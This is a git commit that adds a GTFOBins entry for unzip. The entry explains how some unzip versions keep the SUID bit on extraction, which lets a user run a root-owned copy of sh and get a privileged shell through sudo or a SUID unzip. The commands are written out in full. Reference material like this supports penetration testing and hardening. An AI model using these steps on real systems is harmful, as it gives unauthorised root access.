Add unzip

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Pablo 2022-07-13 15:03:27 +02:00 committed by GitHub
parent e9306c73da
commit 2b769ace78
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

21
_gtfobins/unzip.md Normal file
View File

@ -0,0 +1,21 @@
---
description: |
Certain `unzip` versions allows to preserve the SUID bit. Prepare an archive beforehand with the following commands as root:
```
cp /bin/sh .
chmod +s sh
zip shell.zip sh
```
Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).
functions:
sudo:
- code: |
sudo unzip -K shell.zip
./sh -p
suid:
- code: |
./unzip -K shell.zip
./sh -p
---